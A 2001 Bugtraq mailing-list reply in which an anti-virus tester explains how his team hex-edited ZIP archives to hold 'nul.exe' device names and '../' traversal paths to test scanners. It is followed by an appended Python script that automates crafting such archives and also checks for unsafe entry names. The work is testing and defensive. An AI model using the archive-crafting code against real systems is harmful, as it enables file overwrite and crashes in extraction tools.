Bugtraq mailing list archives

Re: SECURITY.NNOV: special devices access in multiple archivers


From: Andreas Marx <amarx () gega-it de>
Date: Fri, 03 Aug 2001 13:43:06 +0200

Hi!

It's nice to hear that from you. I just want to know what methods
and tools your team used for testing the anti-virus programs.
If you can send them to me, I would be very thankful to you.

We, the Anti-Virus Test Team at the University of Magdeburg ( http://www.av-test.org ) did it the following way (I don't want to be too exact, because of the script kiddies, sorry):

First, we created normal archives using standard archivers (and normal file names like "xul.exe"), but after the archive was created, we edited the files internally using a hex editor (change "x" to "n" - but be careful, in ZIP files the file name is included twice). You cannot add names like "nul.exe" to an archive, of course, but you can change the name inside the archive easily, as long as the length of the name stays the same. You can do this both for "nul.exe" and for additional "../"s in paths like "../../test.exe". (Btw, we used the Volkov Commander (DOS), not a "real" hex editor. :) )

The second step was to test the anti-virus and anti-trojan programs. This was relatively simple, because a few days earlier we had just finished a bigger comparison test for trojaner-info.de, a big German security site ( http://www.trojaner-info.de/test_07_2001.shtml ) with a special focus on trojan horses, backdoors etc. Additional tests were done using a slightly older test set from a review we did for the German PC-WELT magazine ( http://www.pcwelt.de/ratgeber/anwendungen/viren-report/16583/3.html ). We can easily restore the original tested programs including updates, since we use Ghost images for all types of tests. (This includes both the original test platforms, like "plain Win98", and a Ghost image where the AV program was already installed.)

The main test was relatively simple: just scan the archives (for each of the tests we created at least four test files) and see what happens. ;-) After this, we repeated the test to ensure that all results were correct.

I hope this helps to understand the test procedures better.

cheers,
Andreas Marx

NEW: Notes 4/5 + Exchange 5.5/2000 Test -> http://www.av-test.org


--
Andreas Marx <amarx () gega-it de>, http://www.av-test.de
GEGA IT-Solutions GbR, Klewitzstr. 7, 39112 Magdeburg, Germany
Tel: 0391/6075466, Mobil: 0177/6133033, Fax: 0391/6075469
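The hex-editor trick described in the post above, reproduced as an added example (this is not av-test.org's tooling, and the file names, the placeholder payload and the helper names are constructed for illustration): a normal ZIP is written with the standard library, then the entry name is overwritten in both places a ZIP keeps it (the central directory header and the local file header) with a same-length replacement, so "xul.exe" becomes "nul.exe" and "sub/d/test.exe" becomes "../../test.exe" without any offset changing. The last function is the check an archiver or scanner should run before writing an entry to disk: reserved DOS/Windows device names, absolute paths and ".." traversal are flagged.

```python
import io
import re
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"    # local file header
CENTRAL_SIG = b"PK\x01\x02"  # central directory file header
EOCD_SIG = b"PK\x05\x06"     # end of central directory record

# Constructed sample content: harmless placeholder bytes standing in for the
# test file used in the post; no real malware is involved.
SAMPLE_PAYLOAD = b"MZ placeholder payload for archive tests"


def build_archive(entries):
    """Write a normal ZIP in memory with the standard zipfile API.
    Only legal names go in here; the bad names are patched in afterwards."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, payload in entries.items():
            zf.writestr(name, payload)
    return buf.getvalue()


def rename_entries(data, mapping):
    """Return a copy of `data` whose file names are rewritten in BOTH places a
    ZIP stores them: the central directory header and the local file header.
    Replacements must have the same byte length as the originals, because no
    size or offset field is touched (exactly the hex-editor constraint)."""
    data = bytearray(data)
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD: total entry count at +10, central directory size at +12, offset at +16
    n_entries, _cd_size, cd_offset = struct.unpack_from("<HII", data, eocd + 10)
    pos = cd_offset
    for _ in range(n_entries):
        if data[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("bad central directory signature at %d" % pos)
        # central header: name/extra/comment lengths at +28, local offset at +42, name at +46
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        local_off = struct.unpack_from("<I", data, pos + 42)[0]
        name = bytes(data[pos + 46:pos + 46 + name_len])
        new = mapping.get(name.decode("utf-8"))
        if new is not None:
            new_b = new.encode("utf-8")
            if len(new_b) != name_len:
                raise ValueError("replacement must keep the length: %r -> %r" % (name, new_b))
            # copy 1: central directory entry
            data[pos + 46:pos + 46 + name_len] = new_b
            # copy 2: local file header (name length at +26, name at +30)
            if data[local_off:local_off + 4] != LOCAL_SIG:
                raise ValueError("bad local header signature at %d" % local_off)
            if struct.unpack_from("<H", data, local_off + 26)[0] != name_len:
                raise ValueError("local header name length mismatch")
            data[local_off + 30:local_off + 30 + name_len] = new_b
        pos += 46 + name_len + extra_len + comment_len
    return bytes(data)


# DOS/Windows device names; "nul.exe" still hits the NUL device because the
# extension is ignored for reserved names.
RESERVED_DEVICES = ({"CON", "PRN", "AUX", "NUL"}
                    | {"COM%d" % i for i in range(1, 10)}
                    | {"LPT%d" % i for i in range(1, 10)})


def unsafe_names(data):
    """List (name, reason) for entries an extractor or scanner must not write
    to disk as-is: absolute paths, '..' traversal and reserved device names."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            parts = re.split(r"[\\/]", name)
            if name.startswith(("/", "\\")) or re.match(r"[A-Za-z]:", name):
                findings.append((name, "absolute path"))
            elif ".." in parts:
                findings.append((name, "path traversal"))
            elif any(p.split(".")[0].upper() in RESERVED_DEVICES for p in parts):
                findings.append((name, "reserved device name"))
    return findings


def demo():
    """Build a clean archive, apply the two renames from the post, and prove the
    patched archive still parses (both name copies agree) before checking it."""
    clean = build_archive({"xul.exe": SAMPLE_PAYLOAD, "sub/d/test.exe": SAMPLE_PAYLOAD})
    patched = rename_entries(clean, {"xul.exe": "nul.exe",
                                     "sub/d/test.exe": "../../test.exe"})
    with zipfile.ZipFile(io.BytesIO(patched)) as zf:
        assert zf.read("nul.exe") == SAMPLE_PAYLOAD
        assert zf.read("../../test.exe") == SAMPLE_PAYLOAD
    return clean, patched


if __name__ == "__main__":
    clean, patched = demo()
    print("clean archive:", unsafe_names(clean))
    print("patched archive:", unsafe_names(patched))
```

Patching only one of the two copies is a useful negative test: Python's zipfile, like most readers, compares the central directory name with the local header name and refuses the entry when they differ, which is why the post warns that the name is included twice. The CRC is not affected by the rename, since it covers the file data only.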

